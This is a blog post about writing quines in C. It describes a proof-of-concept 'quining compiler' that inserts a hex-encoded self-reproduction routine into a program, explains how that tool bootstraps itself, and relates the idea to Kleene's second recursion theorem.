A quine is a program that can output its own source code. Named after the 20th-century philosopher Willard Van Orman Quine and popularized by Gödel, Escher, Bach, quines have become a quintessential bit of recreational coding. Countless examples can be found among the International Obfuscated C Code Contest (IOCCC) entries. While quines are possible in any Turing-complete programming language— more on that theoretical result below— writing them can be tricky due to the structural requirements placed on the code. The success criterion is strict: the output must be exactly identical to the original source, down to spacing and newlines. A miss is as good as a mile. The starting point for this blog post is a way to simplify the creation of arbitrary quines. For concreteness, this proof of concept will focus on C, but the underlying ideas extend to other programming languages.

Since most interesting quines have some additional functionality besides being able to output their own code, it would be logical to divide development into two steps:

  1. Write the application as one normally would
  2. Convert it into a quine by feeding it through a compiler. (More accurately, a “transpiler” or “transcompiler” since the output itself is another valid program in the same language.)

Motivating example

Consider the canonical example of a quine. It takes no inputs and simply prints out its own source code to standard out. Here is a logical, if somewhat naive, starting point in C:
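A minimal sketch of that starting point might look something like the following (the exact listing could differ in its details); all the heavy lifting is punted to a helper that does not exist yet:

#include <stdio.h>

int main(void) {
    /* get_self() is expected to return this program's complete source code
       as a NUL-terminated string. It is neither declared nor defined here. */
    fputs(get_self(), stdout);
    return 0;
}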

Minor problem: this is not a valid C program. Doing all the heavy lifting is a mystery function “get_self” that is not declared— much less defined— anywhere in the source file. (Historical aside: C used to permit calling such undeclared functions, with an implicit assumption of an integer return type. Those liberties were revoked with the C99 standard. In any case, adding a declaration would merely postpone the inevitable: the compile-time error about an undeclared function becomes a link-time error about an unresolved symbol.)

What if we could feed this snippet into another program that automatically transforms it into a valid C program working as intended? Before going down that path, it is important to clarify the success criteria for a “working” quine. Informally, we are looking for a transformation with these properties:

  • Accepts as input an “almost valid” C program with one undefined function get_self(). This function takes no arguments and returns a NUL-terminated C string.
  • Outputs a valid C program with identical functionality
  • That new program includes a valid C implementation of  get_self() which returns the entire source code of the modified program, including the newly added function.

There are two subtleties here. First, the implementation must return the source code of the modified program, incorporating all additions and changes made by the transformation; printing the original, pre-transformed source would not qualify as a true quine. Second, the implementation provided for the mystery function get_self() must operate at the source level. There are trivial but OS-dependent ways to convert any program into a quine by mucking with the binary executable after compilation is done. For example, the ELF format for Linux executables allows adding new data sections to an existing file. One could take the source code and drop it into the compiled binary as a symbol with a specific name such as “my_source_code.” This allows for a simple get_self() implementation that parses the binary of the current executable, searches the data sections for that symbol and converts the result into a C string. Expedient as that sounds, such approaches are considered cheating and do not qualify as true quines according to the generally accepted definition of a self-replicating program. Informally, the “quineness” property must be intrinsic to the source. In the hypothetical example of playing games with ELF sections, the capability originates with an after-the-fact modification of the binary and is not present anywhere in the source. Another example of cheating would be committing the source code to an external location such as GitHub and downloading it at runtime. Both are disqualified under our definition.

QCC: Quining C Compiler

qcc is a proof of concept that transforms arbitrary C programs into valid quines according to the rules sketched above. For example, running the pre-quine sample from the last section through qcc yields a valid quine.

Looking at the transformed output, we observe the original program reproduced verbatim, sandwiched between prepended and appended sections:

Changes preceding the original source are minimal:

  • Courtesy warning against manual edits, as any change is likely to break the quine property. This is optional and can be omitted.
  • Include directives for standard C libraries required by the get_self() implementation. This is also optional if the original source already includes them. (This PoC does not bother to check. Standard library headers commonly have include guards; second and subsequent inclusions become a noop.) Incidentally, includes can also be deferred until the section of source referencing them. There is no rule dictating that all headers must appear at the start; it is merely a style convention most C/C++ developers abide by.
  • Declaration of get_self(). Also can be omitted if the original program has one.

More substantial additions appear after the original code:

  • Definition of a helper function for hex-decoding.
  • Two string constants carrying hex-encoded payloads. These could have been merged into a single string constant, but keeping them separate helps clarify the quine mechanism.
  • Definition of the get_self() function. This is the core of the implementation.

Hex-decoding the first string shows that it is just the original program, with the minor changes for headers/declaration prepended and the helper function appended. There is nothing self-referential or unusual going on. But the second hex payload, when decoded, is identical to the function get_self(). That is the tell-tale sign of quines: inert “data” strings mirroring code that gets compiled into executable instructions. Note that while the first string constant is a function of the original input program, the second one is identical for all inputs. (This is why separating them helps clarify the mechanism.)
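Putting those pieces together, the generated file has roughly the shape sketched below. This is a structural sketch rather than verbatim qcc output: the identifier names are invented, the hex payload contents are elided, and the reassembly format string is merely illustrative (the real output must reproduce the payload declarations byte for byte for the quine property to hold).

/* WARNING: generated by qcc; manual edits are likely to break the quine property. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

const char *get_self(void);

/* --- original program, reproduced verbatim --- */
int main(void) {
    fputs(get_self(), stdout);
    return 0;
}

/* --- appended: hex-decoding helper --- */
static char *hex_decode(const char *hex) {
    size_t n = strlen(hex) / 2;
    char *out = malloc(n + 1);
    for (size_t i = 0; i < n; i++) {
        unsigned int byte = 0;
        sscanf(hex + 2 * i, "%2x", &byte);
        out[i] = (char)byte;
    }
    out[n] = '\0';
    return out;
}

/* --- appended: the two hex payloads (contents elided in this sketch) ---
   payload_head decodes to everything above these two declarations;
   payload_tail decodes to the get_self() definition below them. */
static const char *payload_head = "";
static const char *payload_tail = "";

/* --- appended: get_self() reassembles the complete source --- */
const char *get_self(void) {
    static char *source = NULL;
    if (source == NULL) {
        char *head = hex_decode(payload_head);
        char *tail = hex_decode(payload_tail);
        size_t len = strlen(head) + strlen(payload_head)
                   + strlen(payload_tail) + strlen(tail) + 256;
        source = malloc(len);
        /* Decoded prefix, then the two payload declarations spelled out with
           their hex contents, then the decoded get_self() definition. */
        snprintf(source, len,
                 "%sstatic const char *payload_head = \"%s\";\n"
                 "static const char *payload_tail = \"%s\";\n\n%s",
                 head, payload_head, payload_tail, tail);
        free(head);
        free(tail);
    }
    return source;
}

The essential trick is that the hex payloads consist of printable characters only, so get_self() can both decode them (to recover the surrounding code) and echo them literally (to recover the two declarations themselves).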

Making a quine out of the quining compiler

Careful readers will note that qcc itself is a C program, but the initial version referenced above is not itself a quine. That will not stand. One natural option is to add a new command line flag that will induce qcc to output its own source code instead of quining another program.

Bootstrapping that has one tricky aspect: one needs a functioning qcc executable before it can quine its own source code. While this could be achieved by maintaining two different versions of the compiler, it is possible to get by with a single version through judicious use of preprocessor tricks and conditional compilation. The trick is defining a preprocessor macro and surrounding any code paths that reference quine-like behavior with #ifdef guards on that macro, as sketched after the steps below:

  1. Add an option to qcc to define this macro explicitly in the transformation when outputting a quine. That capability will come in handy for any application that needs to be a valid C program in its pre-quine state.
  2. Compile with default settings, resulting in the preprocessor macro being undefined and leaving those sections out of the build. (That is a good thing: otherwise compiler errors will result from the nonexistent self-referential function referenced in those lines.)
  3. Run this original, pre-quine qcc binary on its own source code, and specify that the preprocessor macro is to be defined in the output.
  4. Save and recompile the transformed output as the new qcc. No need to explicitly define the preprocessor macro via compiler flags; it is already hardwired into the transformed source.
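Here is a minimal sketch of what such a guard might look like in qcc’s own main(); the macro name QCC_HAVE_SELF and the --self flag are invented for illustration. Without the macro, get_self() is never referenced and the untransformed source builds cleanly; once qcc quines itself and hardwires both the macro and the get_self() definition into the output, the guarded path becomes live.

#include <stdio.h>
#include <string.h>

#ifdef QCC_HAVE_SELF
const char *get_self(void);   /* definition is added by the qcc transformation */
#endif

int main(int argc, char **argv) {
#ifdef QCC_HAVE_SELF
    /* Only compiled into the quined build: dump qcc's own source and exit. */
    if (argc > 1 && strcmp(argv[1], "--self") == 0) {
        fputs(get_self(), stdout);
        return 0;
    }
#endif
    /* ... normal operation: read an input program and emit its quined form ... */
    (void)argc;
    (void)argv;
    return 0;
}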

This final version can now output its own source, in addition to quining other C programs.

Caveats and design options

As this is a proof of concept, there are caveats:

  • It only operates on single files. As such it can not be used to create multiquines, where each program in a collection has access to the source code of every other member. That case can be handled by first concatenating them into a single program and applying some preprocessor tricks (see the sketch following this list). Straight concatenation alone would result in an invalid C program, due to multiple definitions of main, not to mention any other conflicting symbols. But conditional compilation with #ifdef allows activating only a subset of the code during each build.
  • Choice of hex encoding is arbitrary. It is certainly not space-efficient, doubling the size of the original input. On the other hand, using hex avoids the visual clutter/confusion caused by having strings that look like valid C code. Raw C strings also have the drawback that special characters such as double quotes and backslashes must be escaped.  While decoding is free in the sense that the C compiler takes care of it, helper functions are still needed for outputting escaped strings. Hex is simple enough to encode/decode in a handful of lines compared to more elaborate options such as base64 or compression, both of which would require more code inlined into every quine or pull in new library dependencies.
  • The implementation of get_self() is not thread-safe, due to its use of static variables. If multiple threads race to execute the first-time initialization code, the string holding the source code representation will get computed more than once. All threads will still receive a correct value, but extra memory is wasted on the unused copies.
  • String constants are currently emitted as a single line, which may exceed the maximum length a compiler will accept. (The C standard only guarantees support for string literals of at least 4095 characters; most compilers in practice far exceed that limit.)
  • Finally: QCC transformations are easily recognizable. There is no attempt to hide the fact that a quine is being created, and function and variable identifiers have meaningful, intuitive names. This is problematic in contexts such as the IOCCC, where obfuscation and brevity are virtues.
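For illustration, a concatenated multiquine input might be arranged as sketched below; the macro name and program bodies are invented, and like the earlier starting point it will not link until qcc supplies get_self():

#include <stdio.h>
#include <string.h>

const char *get_self(void);   /* to be supplied by qcc */

#ifdef BUILD_PROGRAM_ONE
/* First program: print the combined source verbatim. */
int main(void) {
    fputs(get_self(), stdout);
    return 0;
}
#else
/* Second program: report the size of the combined source instead. */
int main(void) {
    printf("combined source is %zu bytes\n", strlen(get_self()));
    return 0;
}
#endif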

Post-script: excursion on Kleene’s recursion theorem

Stepping back, qcc is an implementation of a transform that is guaranteed to exist by virtue of a result first proven in 1938, namely Kleene’s second-recursion theorem. While that theorem was originally stated in the context of recursive functions, here we state it in an equivalent setting with Turing machines.

Consider a Turing machine T that computes a function of two inputs x and y:

T(x, y) 

Kleene’s result states that there is a Turing machine S which computes a function of just one input, such that the behavior of S on all inputs is closely related to the behavior of T:

∀x: S(x) = T(x, #S)

where #S is the Turing number for the machine S— in other words, a reference to S itself. This statement says that for every input x, S behaves just like the original machine T acting on that input, with the second input hard-wired to S’s own Turing number.

Since programming languages are effectively more convenient ways to construct Turing machines, we can translate this into even more familiar territory. Suppose we have a program P written in a high-level language which takes two inputs:

P(x, y) → output

Kleene’s theorem guarantees the existence of a program Q which takes a single input x and computes:

Q(x) = P(x, source(Q))

Here source(Q) is the analog of Turing numbers for high-level programming languages, namely a textual representation of the program Q in the appropriate alphabet, such as ASCII or Unicode.

For a concrete example, consider replicating a recent IOCCC entry: write a program that outputs its own SHA512 hash. At first this seems impossible, barring a catastrophic break in SHA512. As a cryptographic hash function, SHA512 is designed to be one-way: given a target hash, it is computationally infeasible to find a preimage input that would produce that target when fed into SHA512. Given the difficulty of that basic problem, finding a “self-consistent” program such that its own SHA512 hash is somehow contained in the source code seems daunting. But Kleene’s result makes it tractable. As a starting point, it is easy enough to write a program that receives some input (for example, from console) and outputs the SHA512 hash of that input. Squinting a little, we can view this as a degenerate function on two inputs. The first input is always ignored while the second input is the one processed through the hash function:

P(x, y) = SHA512(y)

Kleene’s recursion theorem then guarantees the existence of a corresponding program Q:

Q(x) = P(x, source(Q)) = SHA512(source(Q))

In other words, Q prints a cryptographic hash of its own source code.
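To make this concrete in qcc terms, here is a hedged sketch of such a pre-quine input: it ignores any external input and simply hashes whatever get_self() returns, so once qcc supplies get_self() the resulting program prints the SHA512 hash of its own source. OpenSSL’s SHA512() is used purely for convenience (link with -lcrypto); the actual IOCCC entry does not necessarily work this way.

#include <stdio.h>
#include <string.h>
#include <openssl/sha.h>

const char *get_self(void);   /* supplied by the qcc transformation */

int main(void) {
    const char *src = get_self();
    unsigned char digest[SHA512_DIGEST_LENGTH];

    /* Hash the program's own source and print it as lowercase hex. */
    SHA512((const unsigned char *)src, strlen(src), digest);
    for (int i = 0; i < SHA512_DIGEST_LENGTH; i++)
        printf("%02x", digest[i]);
    putchar('\n');
    return 0;
}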

Given this background, we have a theoretical view on QCC: For C programs that can be expressed in a single compilation unit, QCC constructs another C program that is the “fixed-point” guaranteed to exist by Kleene’s second recursion theorem, with the second input hard-wired to the source code of the new program.

CP